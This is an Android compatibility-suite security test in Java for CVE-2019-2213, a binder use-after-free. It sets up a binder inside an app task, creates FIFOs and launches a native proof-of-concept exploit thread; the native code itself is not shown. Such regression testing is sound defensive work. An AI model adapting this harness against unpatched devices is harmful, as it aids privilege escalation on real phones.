xref: /aosp_15_r20/cts/tests/tests/security/src/android/security/cts/BinderExploitTest.java (revision b7c941bb3fa97aba169d73cee0bed2de8ac964bf) 
1 /*
2  * Copyright (C) 2019 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 package android.security.cts;
18 
19 import android.system.Os;
20 import android.os.Looper;
21 import android.os.Message;
22 import android.os.ParcelFileDescriptor;
23 import android.os.SystemClock;
24 
25 import android.app.Activity;
26 import android.app.ActivityManager;
27 
28 import android.content.BroadcastReceiver;
29 import android.content.Context;
30 import android.content.ContextWrapper;
31 import android.content.Intent;
32 import android.content.IntentFilter;
33 import android.content.pm.ApplicationInfo;
34 
35 import android.hardware.display.VirtualDisplay;
36 
37 import java.io.IOException;
38 import java.io.BufferedReader;
39 import java.io.InputStream;
40 import java.io.InputStreamReader;
41 
42 import static org.junit.Assert.assertTrue;
43 import androidx.test.InstrumentationRegistry;
44 import androidx.test.runner.AndroidJUnit4;
45 import android.platform.test.annotations.AsbSecurityTest;
46 
47 import java.util.ArrayList;
48 import android.util.Log;
49 
50 import android.graphics.Bitmap;
51 import android.os.Bundle;
52 import android.os.IBinder;
53 import android.system.ErrnoException;
54 import android.widget.TextView;
55 
56 import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
57 
58 import java.io.File;
59 import java.util.List;
60 
61 import org.junit.runner.RunWith;
62 import org.junit.Test;
63 
64 class Exchange extends IBinderExchange.Stub {
65     IBinder binder;
66     BinderExploitTest.CVE_2019_2213_Activity xpl;
Exchange(BinderExploitTest.CVE_2019_2213_Activity xpl)67     Exchange(BinderExploitTest.CVE_2019_2213_Activity xpl) {
68         this.xpl = xpl;
69     }
70     @Override
putBinder(IBinder bnd)71     public void putBinder(IBinder bnd) {
72         this.xpl.addLog("put binder");
73         binder = bnd;
74     }
75     @Override
getBinder()76     public IBinder getBinder() {
77         this.xpl.addLog("get binder");
78         return binder;
79     }
80 }
81 
82 class ExploitThread extends Thread {
83     static {
84         System.loadLibrary("cve_2019_2213_jni");
85     }
86     BinderExploitTest.CVE_2019_2213_Activity xpl;
87     String pipedir;
88 
ExploitThread(BinderExploitTest.CVE_2019_2213_Activity xpl, String pipedir)89     ExploitThread(BinderExploitTest.CVE_2019_2213_Activity xpl, String pipedir) {
90         this.xpl = xpl;
91         this.pipedir = pipedir;
92     }
93 
run()94     public void run() {
95         runxpl(pipedir);
96     }
97 
addLog(String msg)98     void addLog(String msg) {
99         xpl.addLog(msg);
100     }
101 
runxpl(String pipedir)102     public native void runxpl(String pipedir);
103 }
104 
105 @RunWith(AndroidJUnit4.class)
106 public class BinderExploitTest extends StsExtraBusinessLogicTestCase {
107 
108     static final String TAG = BinderExploitTest.class.getSimpleName();
109     private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts";
110 
111     public CVE_2019_2213_Activity mActivity;
launchActivity(Class<? extends Activity> clazz)112     private void launchActivity(Class<? extends Activity> clazz) {
113         final Context context = InstrumentationRegistry.getInstrumentation().getContext();
114         final Intent intent = new Intent(Intent.ACTION_MAIN);
115         intent.setClassName(SECURITY_CTS_PACKAGE_NAME, clazz.getName());
116         intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
117         context.startActivity(intent);
118     }
119 
120     /**
121      * b/141496757
122      */
123     @AsbSecurityTest(cveBugId = 133758011)
124     @Test
testPoc_cve_2019_2213()125     public void testPoc_cve_2019_2213() throws Exception {
126         Log.i(TAG, String.format("%s", "testPoc_cve_2019_2213 start..."));
127 
128         //  set timeout to 5 minutes
129         int timeout = 60;
130 
131         //  run test activity
132         launchActivity(CVE_2019_2213_Activity.class);
133         //  main loop to check forked processs bahaviors
134         while (timeout-- > 0) {
135             SystemClock.sleep(1000);
136         }
137         Log.i(TAG, String.format("%s", "testPoc_cve_2019_2213 finished."));
138     }
139 
140     public static class CVE_2019_2213_Activity extends Activity {
141         ActivityManager actmgr;
142         String log = "";
143 
addLog(String msg)144         synchronized void addLog(String msg) {
145             Log.i("txnuaf", msg);
146             log += msg + "\n";
147             Log.i(TAG, log);
148         }
149 
getAppTask()150         ActivityManager.AppTask getAppTask() {
151             List<ActivityManager.AppTask> list = actmgr.getAppTasks();
152             for (int i = 0; i < list.size(); i++) {
153                 ActivityManager.RecentTaskInfo info = list.get(i).getTaskInfo();
154                 if (info.baseIntent.getExtras() != null)
155                     return list.get(i);
156             }
157             return null;
158         }
159 
setUpBundle()160         void setUpBundle() throws Exception {
161             actmgr = (ActivityManager)getSystemService(ACTIVITY_SERVICE);
162             ActivityManager.AppTask t = getAppTask();
163             if (t != null)
164                 t.finishAndRemoveTask();
165             Intent in = new Intent(this, CVE_2019_2213_Activity.class);
166             Bundle extras = new Bundle();
167             extras.putBinder("bnd", new Exchange(this));
168             in.putExtras(extras);
169             in.setFlags(in.getFlags() | Intent.FLAG_ACTIVITY_NEW_DOCUMENT);
170             Bitmap bmp = Bitmap.createBitmap(1, 1, Bitmap.Config.ALPHA_8);
171             if (actmgr.addAppTask(this, in, null, bmp) == -1)
172                 throw new Exception("addAppTask failed");
173             t = getAppTask();
174             if (t == null)
175                 throw new Exception("no appTask with extras");
176             Bundle b = t.getTaskInfo().baseIntent.getExtras();
177             if (!b.containsKey("bnd"))
178                 throw new Exception("no bnd key");
179             addLog("apptask added");
180         }
181 
makePipes()182         public String makePipes() throws ErrnoException {
183             File dir = getDir("xpldat", 0);
184             for (int i = 0; i < 8; i++) {
185                 File fifo = new File(dir, "p" + i);
186                 if (fifo.exists())
187                     fifo.delete();
188                 Os.mkfifo(fifo.getPath(), 0600);
189             }
190             return dir.getPath();
191         }
192 
193         @Override
onCreate(Bundle savedInstanceState)194         protected void onCreate(Bundle savedInstanceState) {
195             super.onCreate(savedInstanceState);
196 
197             try {
198                 setUpBundle();
199                 (new ExploitThread(this, makePipes())).start();
200             } catch (Exception e) {
201                 addLog(e.toString());
202             }
203         }
204     }
205 
206 
207 }
208